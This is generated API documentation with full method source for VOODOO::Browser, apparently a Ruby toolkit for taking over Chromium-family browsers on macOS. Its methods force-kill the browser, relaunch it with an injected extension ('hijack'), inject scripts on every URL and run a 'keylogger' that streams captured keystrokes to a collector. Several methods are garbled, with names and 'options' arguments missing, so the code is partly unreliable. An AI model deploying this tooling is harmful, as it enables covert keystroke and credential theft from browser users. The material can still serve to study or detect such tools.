Class: VOODOO::Browser
- Inherits:
-
Object
- Object
- VOODOO::Browser
- Defined in:
- lib/voodoo/browser.rb
Instance Attribute Summary collapse
-
#bundle ⇒ Object
Returns the value of attribute bundle.
-
#extension ⇒ Object
readonly
Returns the value of attribute extension.
-
#process_name ⇒ Object
Returns the value of attribute process_name.
Class Method Summary collapse
Instance Method Summary collapse
- #add_host_permissions(hosts) ⇒ Object
- #add_permissions(permissions) ⇒ Object
- #add_script(content: nil, file: nil, matches: nil, options: {}, background: false, max_events: nil, communication: true) ⇒ Object
- #close_browser ⇒ Object
- #hijack(urls = [], flags: '') ⇒ Object
-
#initialize(bundle: nil, process_name: nil, extension: Extension.new) ⇒ Browser
constructor
A new instance of Browser.
- #keylogger(matches: '*://*/*', max_events: nil) ⇒ Object
Constructor Details
#initialize(bundle: nil, process_name: nil, extension: Extension.new) ⇒ Browser
Returns a new instance of Browser.
11 12 13 14 15 16 17 18 19 |
# File 'lib/voodoo/browser.rb', line 11 def initialize(bundle: nil, process_name: nil, extension: Extension.new) @bundle = bundle @extension = extension @process_name = process_name @collector_threads = [] @extension.manifest[:permissions] = ['tabs', 'storage'] matches = '*://*/*' end |
Instance Attribute Details
#bundle ⇒ Object
Returns the value of attribute bundle.
8 9 10 |
# File 'lib/voodoo/browser.rb', line 8 def bundle @bundle end |
#extension ⇒ Object (readonly)
Returns the value of attribute extension.
7 8 9 |
# File 'lib/voodoo/browser.rb', line 7 def extension @extension end |
#process_name ⇒ Object
Returns the value of attribute process_name.
9 10 11 |
# File 'lib/voodoo/browser.rb', line 9 def process_name @process_name end |
Class Method Details
.Brave ⇒ Object
71 72 73 |
# File 'lib/voodoo/browser.rb', line 71 def Browser.Brave self.new(bundle: 'com.brave.Browser', process_name: 'Brave Browser') end |
.Chrome ⇒ Object
67 68 69 |
# File 'lib/voodoo/browser.rb', line 67 def Browser.Chrome self.new(bundle: 'com.google.Chrome', process_name: 'Google Chrome') end |
.Chromium ⇒ Object
83 84 85 |
# File 'lib/voodoo/browser.rb', line 83 def Browser.Chromium self.new(bundle: 'org.chromium.Chromium', process_name: 'Chromium') end |
.Edge ⇒ Object
79 80 81 |
# File 'lib/voodoo/browser.rb', line 79 def Browser.Edge self.new(bundle: 'com.microsoft.edgemac', process_name: 'Microsoft Edge') end |
.Opera ⇒ Object
75 76 77 |
# File 'lib/voodoo/browser.rb', line 75 def Browser.Opera self.new(bundle: 'com.operasoftware.Opera', process_name: 'Opera') end |
Instance Method Details
#add_host_permissions(hosts) ⇒ Object
35 36 37 38 |
# File 'lib/voodoo/browser.rb', line 35 def (hosts) hosts = [hosts] unless hosts.is_a? Array @extension.manifest[:host_permissions] += hosts end |
#add_permissions(permissions) ⇒ Object
30 31 32 33 |
# File 'lib/voodoo/browser.rb', line 30 def () = [] unless .is_a? Array @extension.manifest[:permissions] += end |
#add_script(content: nil, file: nil, matches: nil, options: {}, background: false, max_events: nil, communication: true) ⇒ Object
87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 |
# File 'lib/voodoo/browser.rb', line 87 def add_script(content: nil, file: nil, matches: nil, options: {}, background: false, max_events: nil, communication: true) if matches != nil && background != false puts 'WARNING: matches is ignored when background is set to true.' end if content == nil && file != nil content = File.read file end if content == nil raise StandardError.new(':content or :file argument are required') end event_count = 0 if block_given? && communication == true collector = Collector.new(close_browser: method(:close_browser)) collector.on_json {|jsond| yield jsond if (max_events != nil) event_count += 1 if event_count >= max_events.to_i collector.thread.kill end end } @collector_threads.push(collector.thread) [:collector_url] = collector.url end .keys.each do |key| [(key.to_sym rescue key) || key] = .delete(key) end voodoo_js = File.read(File.join(__dir__, 'js/voodoo.js')) content = voodoo_js + "\n" + content # find variables variables = content.scan(/%{[a-z_0-9]+}/i) for var in variables # remove %{} var_sym = var[2...(var.length)-1].to_sym if ![var_sym] # when option is missing set it to nil [var_sym] = nil else if ![var_sym].kind_of? String content = content.gsub("\"#{var}\"", var) [var_sym] = JSON.generate([var_sym]) end end end content = content % if background == true return @extension.add_service_worker(content: content) else if matches == nil matches = '*://*/*' end return @extension.add_content_script(matches, js: [content]) end end |
#close_browser ⇒ Object
40 41 42 43 44 45 |
# File 'lib/voodoo/browser.rb', line 40 def close_browser # kill the browser process twise, to bypass close warning `pkill -a -i "#{@process_name}"` `pkill -a -i "#{@process_name}"` sleep 0.2 end |
#hijack(urls = [], flags: '') ⇒ Object
47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 |
# File 'lib/voodoo/browser.rb', line 47 def hijack(urls = [], flags: '') close_browser() urls = [urls] unless urls.kind_of? Array urls = urls.uniq `open -b "#{@bundle}" --args #{flags} --load-extension="#{@extension.save}" #{urls.shift}` if urls.length > 0 sleep 0.5 for url in urls `open -b "#{@bundle}" -n -g -j --args #{url}` end end for thread in @collector_threads thread.join end end |
#keylogger(matches: '*://*/*', max_events: nil) ⇒ Object
21 22 23 24 25 26 27 28 |
# File 'lib/voodoo/browser.rb', line 21 def keylogger(matches: '*://*/*', max_events: nil) add_script(matches: matches, file: File.join(__dir__, 'js/keylogger.js'), max_events: max_events ) do |event| yield event end end |